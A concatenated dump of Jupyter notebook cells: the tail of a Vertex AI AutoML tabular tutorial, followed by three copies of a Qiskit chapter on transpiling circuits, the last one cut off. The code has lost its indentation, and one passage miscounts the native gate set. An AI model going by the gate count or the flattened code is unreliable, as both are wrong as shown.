###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification_toy.csv"
! gsutil cp gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/petfinder-tabular-classification_toy.csv [Content-Type=text/csv]...
[1 files][378.2 KiB/378.2 KiB]
Operation completed over 1 objects/378.2 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce we have defined your training script, we will create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.**NOTE: It takes nearly 2 hours 15 minutes to complete the training. Please wait till the training get completed. If your training takes more time than lab time, please only review the next sections.**
###Code
# TODO 1
# Constructs a AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around two hour and half to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projectsshutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
|
content/ch-quantum-hardware/transpiling-quantum-circuits.ipynb | ###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below. Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
